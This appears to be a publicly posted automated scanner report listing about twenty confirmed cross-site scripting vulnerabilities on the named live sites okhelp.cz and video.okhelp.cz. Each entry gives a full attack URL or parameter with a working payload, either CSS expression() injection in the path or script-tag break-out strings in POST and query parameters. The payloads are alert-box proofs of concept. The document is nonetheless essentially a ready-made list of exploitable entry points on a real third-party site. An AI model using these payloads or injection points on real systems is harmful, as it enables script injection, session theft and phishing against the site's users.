sroub3k

okhelp.cz

Jan 11th, 2013
||| XSS (Cross-site Scripting) - http://okhelp.cz

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/sms-zdarma.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/povodne.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/index.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/jizdni-rady.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/predpoved-pocasi.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/tv-program.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/stolety-kalendar.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/benzin-nafta-lpg-ceny-phm.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/kalendar.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php/" stYle="x:expre/**/ssion(alert(9))
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /" stYle="x:expre/**/ssion(alert(9))

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: den
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000186)</script>

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: mesic
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x00018F)</script>

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php?rok='"--></style></script><script>alert(0x000196)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: rok
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000196)</script>

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/stolety-kalendar.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: rok
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0001C3)</script>

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: rok
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0001CA)</script>

Severity: Important
Confirmation: Confirmed
URL: http://okhelp.cz/presny-cas/vytvor-kalendar-pro-urcity-rok.php?rok=2012
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: rok
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000203)</script>

||| XSS (Cross-site Scripting) - http://video.okhelp.cz

Severity: Important
Confirmation: Confirmed
URL: http://video.okhelp.cz/index.php?db='"--></style></script><script>alert(0x000004)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: db
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000004)</script>

Severity: Important
Confirmation: Confirmed
URL: http://video.okhelp.cz/index.php?db='"--></style></script><script>alert(0x000064)</script>&post=katy-perry_firework
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: db
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000064)</script>

Severity: Important
Confirmation: Confirmed
URL: http://video.okhelp.cz/index.php?db=best_of_hits_2010&post='"--></style></script><script>alert(0x000085)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: post
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000085)</script>